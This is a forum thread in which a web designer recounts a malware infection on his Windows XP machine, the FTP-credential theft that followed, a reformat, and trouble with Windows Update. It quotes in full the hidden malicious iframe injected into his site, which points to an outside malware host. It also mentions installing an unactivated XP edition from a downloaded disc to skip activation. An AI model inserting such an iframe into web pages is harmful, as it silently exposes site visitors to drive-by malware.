This topic is now about XSS Injections and Windows Update.

[jlizarraga]

[edit: This first post was about a virus. I have since reformatted. Check out my next post for the sequel!]

Hi all,

I'm just going to copy and paste what I put into another forum. Hoping I don't have to resort to Geek Squad or something!

###

Never had a virus before and don't even know where to start when it has locked down my antivirus programs - so as instructed by the pinned Malware Infections guide:

2) Include all information!
---------------------

I am using Windows XP Home SP3. I keep my computer pretty tidy, and run Avira AntiVir as my virus protection. I have been experiencing major slowness, especially when running IE6 (which I only use to debug my own websites).

I have a suspicious process called Josh.exe (Josh is my Windows User Name) that has been accompanying the slowdown. This process always uses 2% CPU and around 2MB of memory. Since this process and the slowdown have shown up, my "PF Usage" hovers around 50%, while it is normally around 5%.

--> When did the problem start

I am almost 100% positive that I got the virus when I received files from a client for a web design gig, which was two days ago. These files came from the computer of the least tech-savvy person imaginable, so it is highly likely that they could have been infected. I can't believe I didn't think to scan them.

--> What you've tried so far to fix it

The virus is preventing me from using the following programs:

Avira AntiVir Personal
Spybot Search & Destroy
HijackThis

When I try to open any of these programs, nothing happens. I have never had problems with my computer before, and these are the only programs which are experiencing any trouble (other than the general slowness), which is why I assume the issue is a virus or some type of malware.

--> If you did anything unusual to the system before the problem started

Almost positive the client's files are what infected me. Nothing on my system has changed for quite some time.

--> What are the symptoms of the problem?

- Cannot open any anti-virus or anti-malware programs.
- General sluggishness, when I've kept my PC defragged and in shape for years. This PC is nothing but Windows XP, Adobe programs, and web browsers.
- Suspicious "[User Name].exe" process that is freaking impossible to google.
- "PF Usage" constantly around 50%.

--> Any logfiles you've got through your previous steps (HijackThis, antivirus logs, etc.)
And anything else you think is relevant.

I tried to run HijackThis but I can't even open it.




Thanks A TON for any help! I don't know where to start when I can't even run a scan.

[Master_script_maker]

Try to end the [Username].exe process. I have Win Xp and have never seen any process named your username. This is most likely your virus, because viruses try to get a comfortable name, that you are unsure to delete. After you end the process try running the anti-virus.

[djr33]

It's time to reformat your computer, basically. You can try to keep viruses away, but once you get one it's just a long battle that you'll eventually lose most of the time.
You can of course try, and you should do so, so that you can save your files to disk first, but the only real "fix" is to reformat. Not a bad idea every once in a while anyway

[jlizarraga]

Thanks for the responses, guys.

I did decide to just reformat. I hadn't even though of that option when I posted this - I've only just recently moved all my files to network storage. Incredibly lucky timing!

Master script maker: I forgot to mention this, but I was unable to stop the process - it would just give an error. It would also deselect itself if I left-clicked on it. If I booted without startup services, the process never showed up.

The plot thickens...

So after reformatting, I noticed that my site was messed up. I check the source and there's a malicious iframe. I am apparently the victim of an injection attack, and this is the code it is sticking on my site:

Code:

<iframe src="http://findbigname.cn/ts/in.cgi?banner4" width=2 height=4 style="visibility: hidden"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

Our local copy of the files (on the networked storage) do not have this junk in them - only the ones on the server do.

Door #1, Door #2, or Door #3?!

Door #1: The timing of the injection seems to match the timing of my infection. A couple weeks ago there was a topic here on DD [edit: found the topic] about a virus going around that harvests your FTP logins and injects its malicious code onto whatever sites it can successfully access. The only site that seems to have been attacked, however, is my own (and not my clients'). I would think there would have been more sites affected if this was the method.

Are there some kind of logs I can check to see how and when the injection took place? I am a total server noob. I use DreamHost.

Door #2: Just a few days ago I posted a topic asking about the potential vulnerabilities of my contact form script:

http://www.dynamicdrive.com/forums/s...ad.php?t=44770

The timing would make it pretty damn ironic, but this form has been up for a month or so.

Door #3: Could it be because my site is a WordPress site? I used DreamHost's one-click install service to install it, and it was the most current version at the time. This was about a month and a half ago. WordPress would tell me if it needed to be updated, right? It tells me when I need to update plugins, and I always do.

This wall of text just keeps going. You are a trooper.

Getting back to that reformatting...

About 8 years ago I bought a pre-built PC with Windows XP Home. A few years back I replaced that computer with one I put together. Since I didn't have a Windows disc from my pre-built, I downloaded one of those 9-in-1 Windows XP SP2 DVDs, and installed Windows XP Home from that, using my legitimate serial number and everything.

Activating Windows on the new machine, as I found out, was a nightmare. I had to call Microsoft and spend an hour on the phone with them. So this time after the reformat, I installed Windows XP Corporate instead, as it doesn't ask for activation.

As this was SP2, it needed a lot of updating. I always seem to have trouble getting Windows Update to do its thing on fresh XP installations, and so far this has been no different. First I set it to update at the next hour. Nothing. I then set it to download the updates and let me choose when to install them, waited an hour, and still nothing.

I'm pretty sure I'm doing it wrong, lol. I always have to toggle these options again and again and restart the computer to get the updates to start downloading. When I was finally able to get the first batch of updates to start, it downloaded and installed 34 updates.

And now it's stuck. It won't download updates no matter what I try or what options I pick. This is a totally new XP install - only mobo and video card drivers installed. Is there a way to manually check for updates? Should I bite the bullet and install Home again?

Longest post ever. Thanks for reading!

[jlizarraga]

Time to finally put this topic to a close:

The malicious iframe attack came from someone getting a hold of my FTP password. My FTP password has only ever been in 3 places: 1) my email when DreamHost sent it to me, 2) my home copy of Dreamweaver, 3) my work copy of Dreamweaver.

Nothing else from my email or my work has been compromised, so I'm left to assume that it was indeed the virus/malware/whatever. The weird thing, though, is that it only affected the FreshCut site - unless it was somehow go after my most active/most used FTP account, I can't fgure out why it wouldn't have started at the beginning of the alphabet or something.

As for Windows XP Corporate, after continuing the struggle to update I just reinstalled Home with my legit key, then discovered the magical "Window Update" tool you can download to update manually. I also didn't have any trouble activating this time - maybe because the hardware configuration was the same? I seem to remember something about hardware changes affecting activation.

And the rest, as they say, is history!